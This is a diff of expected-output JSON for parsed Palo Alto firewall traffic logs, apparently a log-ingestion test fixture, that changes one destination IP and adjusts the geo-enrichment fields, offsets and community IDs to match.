@@ -6723,19 +6333,15 @@ "client.packets": 1, "client.port": 59295, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -6748,7 +6354,7 @@ "event.end": "2012-04-10T04:39:51.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:51.000-02:00", "event.timezone": "-02:00", @@ -6760,10 +6366,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 24324, + "log.offset": 24278, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:AEtFqIuwxZ9TQ3w9m74nOrboCXE=", + "network.community_id": "1:BV30Tkuh3C81MwjElomoGcaQISc=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -6795,14 +6401,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", 
@@ -6826,14 +6432,7 @@ "client.port": 59196, "client.user.name": "crusher", "destination.address": "62.211.68.12", - "destination.as.number": 3269, - "destination.as.organization.name": "Telecom Italia", "destination.bytes": 922, - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "IT", - "destination.geo.country_name": "Italy", - "destination.geo.location.lat": 43.1479, - "destination.geo.location.lon": 12.1097, "destination.ip": "62.211.68.12", "destination.packets": 7, "destination.port": 80, @@ -6859,7 +6458,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 24688, + "log.offset": 24640, "network.application": "web-browsing", "network.bytes": 1500, "network.community_id": "1:t42FnU6e46qlRX0ij7ufkKPs3Co=", @@ -6924,19 +6523,15 @@ "client.packets": 1, "client.port": 59291, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -6949,7 +6544,7 @@ "event.end": "2012-04-10T04:39:51.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:51.000-02:00", "event.timezone": "-02:00", @@ -6961,10 +6556,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 25063, + "log.offset": 25015, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:AuQEAPptnfXLW8oL/ac3CM4Gnnw=", + "network.community_id": "1:xHSG5OWliVYrQrcpFpqQQ8rABOQ=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -6996,14 +6591,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", 
@@ -7027,14 +6622,7 @@ "client.port": 52858, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -7060,7 +6648,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 25427, + "log.offset": 25377, "network.application": "dns", "network.bytes": 77, "network.community_id": "1:ZVsgbE2ux52iF80QIxJN36vdI1M=", @@ -7126,14 +6714,7 @@ "client.port": 61383, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -7159,7 +6740,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 25780, + "log.offset": 25730, "network.application": "dns", "network.bytes": 77, "network.community_id": "1:p68po3QtexuC2kor01hJgMDKiPM=", 
@@ -7224,19 +6805,15 @@ "client.packets": 1, "client.port": 59290, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -7249,7 +6826,7 @@ "event.end": "2012-04-10T04:39:50.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:50.000-02:00", "event.timezone": "-02:00", @@ -7261,10 +6838,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 26133, + "log.offset": 26083, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:2UbFMV1DsXMB0b/AUotNCCsHm0s=", + "network.community_id": "1:xYos/Wgi+h9Q+dddrLHkE05fDcY=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -7296,14 +6873,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", 
@@ -7327,14 +6904,7 @@ "client.port": 59195, "client.user.name": "crusher", "destination.address": "8.5.1.1", - "destination.as.number": 3356, - "destination.as.organization.name": "Level 3 Parent, LLC", "destination.bytes": 26786, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "8.5.1.1", "destination.packets": 22, "destination.port": 80, @@ -7360,7 +6930,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 26497, + "log.offset": 26445, "network.application": "web-browsing", "network.bytes": 28096, "network.community_id": "1:J6pba/4Qby485gtIOBCJnQ0T04E=", @@ -7426,14 +6996,7 @@ "client.port": 49812, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -7459,7 +7022,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 26873, + "log.offset": 26821, "network.application": "dns", "network.bytes": 83, "network.community_id": "1:iSTXT01g3/K5eC8sEHIzTaFShsA=", 
@@ -7525,14 +7088,7 @@ "client.port": 50185, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -7558,7 +7114,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 27226, + "log.offset": 27174, "network.application": "dns", "network.bytes": 83, "network.community_id": "1:3UaggcKnXvkcjpVHqbTU3mCMT5E=", @@ -7623,19 +7179,15 @@ "client.packets": 1, "client.port": 59286, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -7648,7 +7200,7 @@ "event.end": "2012-04-10T04:39:50.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:50.000-02:00", "event.timezone": "-02:00", @@ -7660,10 +7212,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 27579, + "log.offset": 27527, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:M8DHGZjrHyuCRpC9MNNfDUke5g4=", + "network.community_id": "1:rCE7GRimBj3QOL9WyI+CJq1w2hU=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -7695,14 +7247,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", @@ -7752,7 +7304,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 27943, + "log.offset": 27889, "network.application": "dns", "network.bytes": 244, "network.community_id": "1:aqHtUqeIwO72eo1M5ATE45cIze8=", 
@@ -7818,17 +7370,7 @@ "client.port": 59194, "client.user.name": "crusher", "destination.address": "212.48.10.58", - "destination.as.number": 8660, - "destination.as.organization.name": "Italiaonline S.p.A.", "destination.bytes": 9064, - "destination.geo.city_name": "Assago", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "IT", - "destination.geo.country_name": "Italy", - "destination.geo.location.lat": 45.4087, - "destination.geo.location.lon": 9.1225, - "destination.geo.region_iso_code": "IT-MI", - "destination.geo.region_name": "Milan", "destination.ip": "212.48.10.58", "destination.packets": 9, "destination.port": 80, @@ -7854,7 +7396,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 28310, + "log.offset": 28256, "network.application": "web-browsing", "network.bytes": 10097, "network.community_id": "1:ZM81iQMHQAIwuZHdw5tm5lXF25A=", @@ -7920,17 +7462,7 @@ "client.port": 59192, "client.user.name": "crusher", "destination.address": "212.48.10.58", - "destination.as.number": 8660, - "destination.as.organization.name": "Italiaonline S.p.A.", "destination.bytes": 9124, - "destination.geo.city_name": "Assago", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "IT", - "destination.geo.country_name": "Italy", - "destination.geo.location.lat": 45.4087, - "destination.geo.location.lon": 9.1225, - "destination.geo.region_iso_code": "IT-MI", - "destination.geo.region_name": "Milan", "destination.ip": "212.48.10.58", "destination.packets": 10, "destination.port": 80, @@ -7956,7 +7488,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 28683, + "log.offset": 28629, "network.application": "web-browsing", "network.bytes": 10105, "network.community_id": "1:yYl3JBOjYyGDcmf0pDc+hxky9gU=", 
@@ -8048,7 +7580,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 29056, + "log.offset": 29002, "network.application": "dns", "network.bytes": 214, "network.community_id": "1:VW3f2r1OUrbsOCF06MDfY/o+epU=", @@ -8140,7 +7672,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 29423, + "log.offset": 29369, "network.application": "dns", "network.bytes": 170, "network.community_id": "1:yvOxIP48drmX6OmaQqFTRaGanko=", @@ -8205,19 +7737,15 @@ "client.packets": 1, "client.port": 59282, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -8230,7 +7758,7 @@ "event.end": "2012-04-10T04:39:49.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:49.000-02:00", "event.timezone": "-02:00", @@ -8242,10 +7770,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 29789, + "log.offset": 29735, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:Vfi4CxQayypb3DoxclNfeNjXdjo=", + "network.community_id": "1:0Ma3cvskYuynmIkvb9KtKByU6JA=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -8277,14 +7805,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", 
@@ -8308,14 +7836,7 @@ "client.port": 57846, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -8341,7 +7862,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 30153, + "log.offset": 30097, "network.application": "dns", "network.bytes": 71, "network.community_id": "1:cWkoifFGPLq+ZcxaNzzYym9H7jI=", @@ -8407,14 +7928,7 @@ "client.port": 51008, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -8440,7 +7954,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 30506, + "log.offset": 30450, "network.application": "dns", "network.bytes": 71, "network.community_id": "1:SicjKSp4oQCovx4rjFSg+IThGYA=", 
@@ -8505,19 +8019,15 @@ "client.packets": 1, "client.port": 59281, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -8530,7 +8040,7 @@ "event.end": "2012-04-10T04:39:49.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:49.000-02:00", "event.timezone": "-02:00", @@ -8542,10 +8052,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 30859, + "log.offset": 30803, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:/tG+YfZ8qFKrUDfQ7EThCBXci9Y=", + "network.community_id": "1:8GDPB5ZfeGIOX/3DLPuYG5D0Gko=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -8577,14 +8087,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", 
@@ -8608,14 +8118,7 @@ "client.port": 55252, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -8641,7 +8144,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 31223, + "log.offset": 31165, "network.application": "dns", "network.bytes": 80, "network.community_id": "1:cp0HVI5MHMB+G4/hIuKGoX1WWac=", @@ -8733,7 +8236,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 31576, + "log.offset": 31518, "network.application": "dns", "network.bytes": 176, "network.community_id": "1:X6pWtJqspZOnEXaF1nKblB/B3f4=", @@ -8799,14 +8302,7 @@ "client.port": 60989, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -8832,7 +8328,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 31942, + "log.offset": 31884, "network.application": "dns", "network.bytes": 80, "network.community_id": "1:bIf8k1Z5+8sNSsr63qo8XknzQDo=", 
@@ -8897,19 +8393,15 @@ "client.packets": 1, "client.port": 59280, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -8922,7 +8414,7 @@ "event.end": "2012-04-10T04:39:48.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:48.000-02:00", "event.timezone": "-02:00", @@ -8934,10 +8426,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 32295, + "log.offset": 32237, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:IRI0j5xLyLhwaONpy7gVZdl/Qow=", + "network.community_id": "1:Qa15R3rz4GWk8OTZoeYfdAqCt1M=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -8969,14 +8461,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", 
